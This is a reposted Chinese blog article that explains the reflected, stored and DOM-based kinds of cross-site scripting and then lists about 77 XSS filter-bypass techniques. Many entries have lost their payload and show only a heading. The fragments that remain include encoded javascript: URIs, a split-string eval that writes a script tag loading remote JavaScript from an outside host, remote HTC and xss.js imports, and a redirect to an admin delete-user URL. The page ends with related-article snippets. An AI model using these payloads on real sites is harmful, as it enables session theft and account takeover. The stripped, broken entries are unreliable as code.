html双角引符编码,XSS攻击常识及常见的XSS攻击脚本汇总

最新推荐文章于 2024-04-01 20:49:40 发布
最新推荐文章于 2024-04-01 20:49:40 发布
阅读量295 收藏
点赞数
文章标签: html双角引符编码

一、什么是XSS?

XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。

二、XSS分类

XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS

1、反射型XSS

发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。

2、存储型XSS

存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码

最典型的例子是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器发现有XSS代码,就当做正常的HTML与Js解析执行,于是触发了XSS攻击。

3、DOM XSS

DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。

附常见的XSS攻击方法

(1)普通的XSS JavaScript注入

(2)IMG标签XSS使用JavaScript命令

xss.js

(3)IMG标签无分号无引号

(4)IMG标签大小写不敏感

(5)HTML编码(必须有分号)

(6)修正缺陷IMG标签

alert("XSS")">

(7)formCharCode标签(计算器)

(8)UTF-8的Unicode编码(计算器)

jav..%E7%9C%81%E7%95%A5..S')

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

jav..%E7%9C%81%E7%95%A5..S')

(10)十六进制编码也是没有分号(计算器)

java..%E7%9C%81%E7%95%A5..XSS')

(11)嵌入式标签,将Javascript分开

jav%20ascript:alert('XSS');

(12)嵌入式编码标签,将Javascript分开

jav%20ascript:alert('XSS');

(13)嵌入式换行符

jav%20ascript:alert('XSS');

(14)嵌入式回车

jav%20ascript:alert('XSS');

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

(16)解决限制字符(要求同页面)

z='document.'z=z+'write("'z=z+'z=z+'tp://ww'z=z+'w.shell'z=z+'.net/1.'z=z+'js>z=z+'ript>")'eval_r(z)

(17)空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl -e 'print "java%5C0script:alert(%5C%22XSS%5C%22)";' > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e 'print "alert(\"XSS\")";' > out

(19)Spaces和meta前的IMG标签

(20)Non-alpha-non-digit XSS

(21)Non-alpha-non-digit XSS to 2

(22)Non-alpha-non-digit XSS to 3

(23)双开括号

(24)无结束脚本标记(仅火狐等浏览器)

(25)无结束脚本标记2

(26)半开的HTML/JavaScript XSS

(27)双开角括号

(28)无单引号 双引号 分号

a=/XSS/alert(a.source)

(29)换码过滤的JavaScript

\";alert('XSS');//

###(30)结束Title标签

alert("XSS");

(31)Input Image

(32)BODY Image

(33)BODY标签

(34)IMG Dynsrc

(35)IMG Lowsrc

(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)

  • XSS

    (40)IMG VBscript

    • XSS

      (41)META链接url

      (42)Iframe

      (43)Frame

      12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6

      (44)Table

      (45)TD

      (46)DIV background-image

      (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)

      (48)DIV expression

      (49)STYLE属性分拆表达

      (50)匿名STYLE(组成:开角号和一个字母开头)

      (51)STYLE background-image

      (52)IMG STYLE方式

      exppression(alert("XSS"))'>

      (53)STYLE background

      (54)BASE

      (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

      (56)在flash中使用ActionScrpt可以混进你XSS的代码

      a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);

      (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

      <?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">XSS

      (58)如果过滤了你的JS你可以在图片里添加JS代码来利用

      (59)IMG嵌入式命令,可执行任意命令

      a.php?a=b

      (60)IMG嵌入式命令(a.jpg在同服务器)

      Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

      (61)绕符号过滤

      (62)

      (63)

      (64)

      (65)

      (66)12-7-1 T00LS - Powered by Discuz! Board

      https://www.a.com/viewthread.php?action=printable&tid=15267 4/6

      (67)

      document.write("PT SRC="http://3w.org/xss.js">

      (68)URL绕行

      XSS

      (69)URL编码

      XSS

      (70)IP十进制

      XSS

      (72)IP八进制

      XSS

      (74)节省[http:]

      XSS

      (75)节省[www]

      XSS

      (76)绝对点绝对DNS

      XSS

      (77)javascript链接

      XSS

      作者:睿睿熊

      转载链接:https://www.jianshu.com/p/36b3578a6629

weixin_39869197
关注
XSS学习(一)之HTML
Praifire的博客
08-11 1989
学习网站:http://xsst.sinaapp.com/example/1-1.php 一、Xss全称是cross site scripting,即跨站脚本攻击。 二、用处:作为用来窃取信息的主要攻击方式。 三、Cookies :Cookies一词用在程序设计中是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。从本质上讲,它可以看作是你的身份证
xss攻击 html代码,常见XSS攻击代码
weixin_35671110的博客
06-07 2077
第一类:在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用。eg:1.使html元素占据整个显示页面 2.增加属性触发事件 3.自动触发事件在真实环境中,‘ 、" 、( 、) 都是属于黑名单中的成员,如果遇到以上四个字符被过滤的情况,那么我们就需要使用其他字符去代替,或者编码的方式去绕过。eg:1.不使用 " 2.不使用 ‘ 3.不使用...
htmlEncode编码htmlDecode解码,防止XSS攻击
yangpan2014的博客
07-10 1882
innerHTML: 可以解析HTML代码 innerText:不能解析HTML代码,获得内容与HTML解析的内容一样 textContent:不能解析HTML代码,获取的内容与源码内容一样 export function htmlEncode(html) { var temp = document.createElement ("div"); (temp.textContent !=...
XSS】通过对HTML响应进行编码来防止跨站点脚本攻击
qgnczmnmn的博客
12-08 1669
公司将应用程序移动到Web上,以改善客户互动,降低业务处理成本并加快结果的速度。但是这样做也会增加漏洞-除非安全性是应用程序开发过程中不可或缺的组成部分。要了解有关在组织中创建安全文化的更多信息,请下载并阅读“安全Web应用程序:创建安全文化”。在跨站点脚本XSS)攻击中,攻击者将恶意代码注入到合法的网页中,然后该网页运行恶意的客户端脚本。当用户访问受感染的网页时,脚本将下载到用户的浏览器并从其运行。此方案有很多变体。恶意脚本可能访问浏览器cookie,会话令牌或浏览器保留的其他敏感信息。但是,所有XSS
xss脚本html标签_引用脚本自己的标签
Web 开发&软件开发
07-25 424
引用脚本自己的标签 有关document.currentScript信息已添加到该帖子中。 document.currentScript应该被认为是更好的选择。 有时,外部脚本的内容可能要引用其自己的SCRIPT标记。 有时,开发人员可能希望检测脚本标记的属性,这些属性用作脚本的选项。 这是Dojo Toolkit多年来所做的一种实践。 Lea Verou的Prism语法荧光笔也使用这...
XSS攻击常识常见XSS攻击脚本汇总.pdf
12-26
XSS攻击常识常见XSS攻击脚本汇总
跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
跨站脚本攻击(XSS,Cross Site Scripting)是一种常见的网络安全漏洞,它允许恶意攻击者在用户浏览器中注入并执行恶意脚本。攻击者通常通过在网页上插入恶意HTML或JavaScript代码来实现这一目标。当用户访问这些被...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结: 1.xss跨站脚本攻击的定义 ...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
03-04
新浪微博攻击事件跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受...
利用html编码进行xss攻击
mgxcool的专栏
06-11 7041
脆弱性测试的时候,发现了一处输出没有做编码转换,但由于开启了magic_quote_gpc,导致提交的数据中,' "都被转义,最后导致输出的地方不能执行恶意js。 如下: 提交的恶意数据为 1 ',alert(123),' 因为被magic_quote_gpc转义,存储到后台的数据也是被转义的,导致输出的
xss攻击原理与解决方法html编码,XSS攻击处理(示例代码)
weixin_31201737的博客
05-31 5341
1、什么是XSS攻击XSS又称为CSS(Cross SiteScript),跨站脚本攻击。其原理是攻击者向有XSS漏洞的网站中“嵌入”恶意的HTML代码,当其他用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如:盗取用户Cookie、重定向到其他网站等。理论上,所有可以输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞。漏洞的厉害取决于攻击代码的能力。2、XSS攻击常见危害...
xss 输出进行html编码,Pikachu:XSS-盲打、过滤、htmlspecialchars、href与js输出
weixin_31530761的博客
06-28 609
XSS盲打:前端数据交互的地方,输入信息,输入后的结果不在前端显示,也就是只有后台能看到输入的内容,从前端无法判断是否存在XSS,这种情况下,我们直接往里面插入XSS代码,然后等待。我们先进入盲打的页面:然后在上面的文本框植入script标签,你的大名的地方随便写就可以:alert('xss') / 123然后发现并没有弹窗,没有特别的事情发生:打开右上角的“点一下提示”,里面的内容提...
【网络安全 / 前端 XSS 防护】一文带你了解 HTML 的特殊字符转义及编码
最新发布
胡西风的博客
04-01 439
如果用户输入的内容未经过转义或编码处理,并且在个人简介页面上直接显示,那么攻击者可以在自我介绍中插入恶意 HTML 标签或属性。例如,当浏览器检测到页面中的特殊字符被正确转义或编码时,它们会将其视为纯文本,不会将其解析为 HTML 标签或脚本。转义时应考虑多重编码:当字符传输经过多个层级或环节时,确保在每个层级或环节上都进行了正确的编码和转义处理。这样,HTML 标签和属性不再被解析为可执行的代码,保护了页面和用户的安全。这样,URL 中的特殊字符被转义为实体编码,防止了恶意代码的执行。
xss 输出进行html编码,【XSSxss输出点总结
weixin_28994357的博客
06-28 901
0x01 HTML标签之间例如输出点:[输出]直接提交alert(1)即可触发XSS,但是当标签是不能执行脚本的标签(总结http://www.jianshu.com/p/211f75b73520),那么就得先把那个标签闭合,然后在注入XSS语句,例如alert(1)0x02 HTML标签之内例如输入点:两种方法:闭合属性,然后用on时间来触发脚本" onmouseover=alert(1) x=...
XSS编码
weixin_46611504的博客
03-24 2155
一:html编码 背景:html编码是用于输出html原本的标签的 比如我想在页面上输出div标签,但是如果我在html标签里直接写的话,就会被当成div标签执行,并不会输出在页面上,这个时候我想将他输出在页面上就需要用html编码 XSS中的应用:这种编码的形式可以用来去绕过一些过滤,比如,有些会过滤掉script ,alert,< >这样的危险的符号,这个时候,就可以用Html编码...
关于HTML 代码注入,XSS攻击问题解决
热门推荐
帅大叔的博客
10-19 3万+
大部分的网站一般都有评论功能或留言功能,或类似可以让用户写东西的地方。如果后台不经过处理,又把数据返回前端,这就会出问题了。网页解析器会把用户的信息也当成html代码给解析了。如果用户写的是一些恶意的 js 脚本这是很危险的。专业术语叫:XSS 攻击一、举个例子:假设后台和前台都没有对用户的信息,进行处理。我们输入如下的代码:<script> var body= document.body;
xss跨站攻击html转义,跨站脚本攻击 XSS攻击基础
weixin_39904522的博客
06-21 708
变态和变态相遇,有一半的可能会情投意合,一般的可能会彼此恶心。这个变态把我恶心坏了。概述个人对XSS攻击的原理认知:原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的...
【前端开发必知】HTML特殊字符转义及编码
等风来
08-25 9841
HTML 中,有一些特殊字符不可直接使用,需要使用转义字符或实体编码来表示。这是为了避免这些字符与 HTML 标签和语法产生冲突。同时,也是为了防范前端XSS。 例如,有些特殊字符(如 < 和 >)作为HTML标签的一部分,要是没有被特殊处理可能被恶意XSSHTML的特殊字符转义及编码在防范跨站脚本攻击(Cross-Site Scripting, XSS)方面起到关键作用。XSS是一种常见的安全漏洞,攻击者通过在受信任网站上插入恶意脚本,使其在用户浏览器中执行。
XSS攻击详解:跨站脚本危害与类型分析
XSS(Cross-site scripting)跨站脚本攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证和过滤用户输入的情况。攻击者通过在网页上注入恶意脚本,使得其他用户在浏览含有这些脚本的页面时,会执行攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值